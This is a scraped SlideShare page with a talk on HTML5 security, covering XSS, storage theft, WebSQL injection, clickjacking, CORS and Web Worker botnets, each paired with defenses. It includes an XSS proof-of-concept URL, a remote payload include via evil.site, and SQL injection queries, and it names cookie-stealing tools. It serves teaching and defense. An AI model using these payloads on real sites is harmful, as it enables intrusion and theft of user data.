SlideShare une entreprise Scribd logo

Talk about html5 security

H
Huang Toby

Talk about html5 security

FormationTechnologie
1  sur  48
Télécharger pour lire hors ligne
youstar@insight-labs
 Introduction to HTML5  HTML5 threat model  Vulnerabilities & Defense  Tools  Reference
 History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
 Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
 Features
 XSS abuse with tags and attributes  Hiding URL Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets
 In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
 Attack:  New XSS Vector  Bypass Black-list Filter  Defense:  Add new tags to Black-list  Change Regex
 DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=< script>history.pushState({},'',location.href.split("?"). shift());document.write(1)</script> http://127.0.0.1/html5/poc/history/xsspoc.php
 Type  LocalStorage:for long-term storage  SessionStorage:for the session application(last when the browser closed)  Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
 Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()  (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()
 Attack  Get the data from the storage(cookie,passwd,etc)  Storage your xss shellcode  Unlimit the path  Defense  Don’t store sensitive data in local storage  Don't use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
 Database Storage  The same as the Google Gears  Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql();  Type  SQLite (support by WebKit)
 Attack  Store shellcode  SQL inject  Defense  Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data
 Store shellcode
 SQL Injection  Use sqlite_master ▪ SELECT name FROM sqlite_master WHERE type='table' ▪ SELECT sql FROM sqlite_master WHERE name='table_name' ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
 Drag and drop basics  Drag Data  the drag feedback image  drag effects  Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
 ClickJacking  XSS + Drag
 CookieJacking  Use many technology to steal user’s local cookies  Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
 Defense  Use iframe with sandbox  If (top !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href
 postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
 Defense  Check the postMessage origin  Don’t use innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage
 Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
 Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ (Flash crossdomain.xml )  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}
 Code like this: <html><body><script> x = new XMLHttpRequest(); x.open("GET",location.hash.substring(1)); x.onreadystatechange=function(){if(x.readyState==4){ document.getElementById("main").innerHTML=x.responseText;}} x.send(); </script> <div id=“main”></div> </body></html>  POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
 Web Workers  running scripts in the background independently  Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects
 Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address
 COR+XSS+Workers=shell of the future
 HTML5CSdump  enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name  JS-Recon  Port Scans  Network Scans  Detecting private IP address
 Imposter  Steal cookies  Set cookies  Steal Local Shared Objects  Steal stored passwords from FireFox  etc  Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures
 Ravan  JavaScript based Distributed Computing system  hashing algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512
 HTML5 带来的新安全威胁:xisigr  Attacking with HTML5:lavakumark  Abusing HTML5:Ming Chow  HTML5 Web Security:Thomas Röthlisberger  Abusing HTML 5 Structured Client-side Storage:Alberto Trivero  Cookiejacking:Rosario Valotta  http://heideri.ch/jso/#html5  http://www.wooyun.org/bugs/wooyun-2011-02351  http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html  http://www.html5test.com
 http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html  http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox  http://code.google.com/intl/zh-CN/apis/gears/api_database.html  http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html  http://www.w3.org/TR/access-control/  http://m-austin.com/blog/?p=19  https://developer.mozilla.org/en/  http://www.w3.org/TR/cors/  http://www.andlabs.org/tools/ravan.html  http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
 Contact Me  email:youstar@foxmail.com  Site:  www.codesec.info  www.insight-labs.org

Recommandé

Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache ShiroClaire Hunsaker
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQL
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQLENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQL
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQLHoracio Gonzalez
 
Single Sign-On with Waffle
Single Sign-On with WaffleSingle Sign-On with Waffle
Single Sign-On with WaffleDaniel Doubrovkine
 
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQL
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQLENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQL
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQLHoracio Gonzalez
 
Scalaで実装してみる簡易ブロックチェーン
Scalaで実装してみる簡易ブロックチェーンScalaで実装してみる簡易ブロックチェーン
Scalaで実装してみる簡易ブロックチェーンHiroshi Ito
 

Recommandé

Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache ShiroClaire Hunsaker
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQL
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQLENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQL
ENIB 2015 2016 - CAI Web S02E03 - Forge JS 2/4 - MongoDB and NoSQLHoracio Gonzalez
 
Single Sign-On with Waffle
Single Sign-On with WaffleSingle Sign-On with Waffle
Single Sign-On with WaffleDaniel Doubrovkine
 
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQL
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQLENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQL
ENIB 2015-2016 - CAI Web - S01E01- MongoDB and NoSQLHoracio Gonzalez
 
Scalaで実装してみる簡易ブロックチェーン
Scalaで実装してみる簡易ブロックチェーンScalaで実装してみる簡易ブロックチェーン
Scalaで実装してみる簡易ブロックチェーンHiroshi Ito
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
Ecom2
Ecom2Ecom2
Ecom2Santosh Pandey
 
Java. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax ApplicationsJava. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax ApplicationsМарія Русин
 
Django - Know Your Namespace: Middleware
Django - Know Your Namespace: MiddlewareDjango - Know Your Namespace: Middleware
Django - Know Your Namespace: Middlewarehowiworkdaily
 
Top 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platformTop 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platformAvi Networks
 
Mongo db for c# developers
Mongo db for c# developersMongo db for c# developers
Mongo db for c# developersSimon Elliston Ball
 
Mongo db for C# Developers
Mongo db for C# DevelopersMongo db for C# Developers
Mongo db for C# DevelopersSimon Elliston Ball
 
Introduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10genIntroduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10genMongoDB
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIsClaire Hunsaker
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Blockchain com JavaScript
Blockchain com JavaScriptBlockchain com JavaScript
Blockchain com JavaScriptBeto Muniz
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programmingAnte Gulam
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 
Html5 and web technology update
Html5 and web technology updateHtml5 and web technology update
Html5 and web technology updateDoug Domeny
 
Forget the Web
Forget the WebForget the Web
Forget the WebRemy Sharp
 
Bare-knuckle web development
Bare-knuckle web developmentBare-knuckle web development
Bare-knuckle web developmentJohannes Brodwall
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196Mahmoud Samir Fayed
 
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHPPHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHPiMasters
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hackingIftach Ian Amit
 
Browser security
Browser securityBrowser security
Browser securityUday Anand
 

Contenu connexe

Tendances

Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
Java. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax ApplicationsJava. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax ApplicationsМарія Русин
 
Django - Know Your Namespace: Middleware
Django - Know Your Namespace: MiddlewareDjango - Know Your Namespace: Middleware
Django - Know Your Namespace: Middlewarehowiworkdaily
 
Top 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platformTop 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platformAvi Networks
 
Introduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10genIntroduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10genMongoDB
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Blockchain com JavaScript
Blockchain com JavaScriptBlockchain com JavaScript
Blockchain com JavaScriptBeto Muniz
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programmingAnte Gulam
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 
Html5 and web technology update
Html5 and web technology updateHtml5 and web technology update
Html5 and web technology updateDoug Domeny
 
Forget the Web
Forget the WebForget the Web
Forget the WebRemy Sharp
 
Bare-knuckle web development
Bare-knuckle web developmentBare-knuckle web development
Bare-knuckle web developmentJohannes Brodwall
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196Mahmoud Samir Fayed
 
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHPPHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHPiMasters
 

Tendances (20)

Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
 
Ecom2
Ecom2Ecom2
Ecom2
 
Java. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax ApplicationsJava. Explicit and Implicit Wait. Testing Ajax Applications
Java. Explicit and Implicit Wait. Testing Ajax Applications
 
Django - Know Your Namespace: Middleware
Django - Know Your Namespace: MiddlewareDjango - Know Your Namespace: Middleware
Django - Know Your Namespace: Middleware
 
Top 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platformTop 10 F5 iRules to migrate to a modern load balancing platform
Top 10 F5 iRules to migrate to a modern load balancing platform
 
Mongo db for c# developers
Mongo db for c# developersMongo db for c# developers
Mongo db for c# developers
 
Mongo db for C# Developers
Mongo db for C# DevelopersMongo db for C# Developers
Mongo db for C# Developers
 
Introduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10genIntroduction to the new official C# Driver developed by 10gen
Introduction to the new official C# Driver developed by 10gen
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
 
Blockchain com JavaScript
Blockchain com JavaScriptBlockchain com JavaScript
Blockchain com JavaScript
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programming
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentation
 
Html5 and web technology update
Html5 and web technology updateHtml5 and web technology update
Html5 and web technology update
 
Forget the Web
Forget the WebForget the Web
Forget the Web
 
Bare-knuckle web development
Bare-knuckle web developmentBare-knuckle web development
Bare-knuckle web development
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196The Ring programming language version 1.7 book - Part 47 of 196
The Ring programming language version 1.7 book - Part 47 of 196
 
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHPPHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP
 

Similaire à Talk about html5 security

Browser security
Browser securityBrowser security
Browser securityUday Anand
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs SilverlightMatt Casto
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWAREFIWARE
 
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlassian
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....HTML5 (and friends) - History, overview and current status - jsDay Verona 11....
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....Patrick Lauke
 
Attractive HTML5~開発者の視点から~
Attractive HTML5~開発者の視点から~Attractive HTML5~開発者の視点から~
Attractive HTML5~開発者の視点から~Sho Ito
 
HTML5 on Mobile
HTML5 on MobileHTML5 on Mobile
HTML5 on MobileAdam Lu
 

Similaire à Talk about html5 security (20)

Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
Browser security
Browser securityBrowser security
Browser security
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWARE
 
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
 
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....HTML5 (and friends) - History, overview and current status - jsDay Verona 11....
HTML5 (and friends) - History, overview and current status - jsDay Verona 11....
 
Attractive HTML5~開発者の視点から~
Attractive HTML5~開発者の視点から~Attractive HTML5~開発者の視点から~
Attractive HTML5~開発者の視点から~
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
前端概述
前端概述前端概述
前端概述
 
HTML5 on Mobile
HTML5 on MobileHTML5 on Mobile
HTML5 on Mobile
 
Html5 For Jjugccc2009fall
Html5 For Jjugccc2009fallHtml5 For Jjugccc2009fall
Html5 For Jjugccc2009fall
 

Dernier

Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parentsnavabharathschool99
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONHumphrey A Beña
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...Postal Advocate Inc.
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...JojoEDelaCruz
 
Food processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture honsFood processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture honsManeerUddin
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...JhezDiaz1
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptxmary850239
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Mark Reed
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)cama23
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersSabitha Banu
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPCeline George
 

Dernier (20)

Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parents
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
 
Food processing presentation for bsc agriculture hons
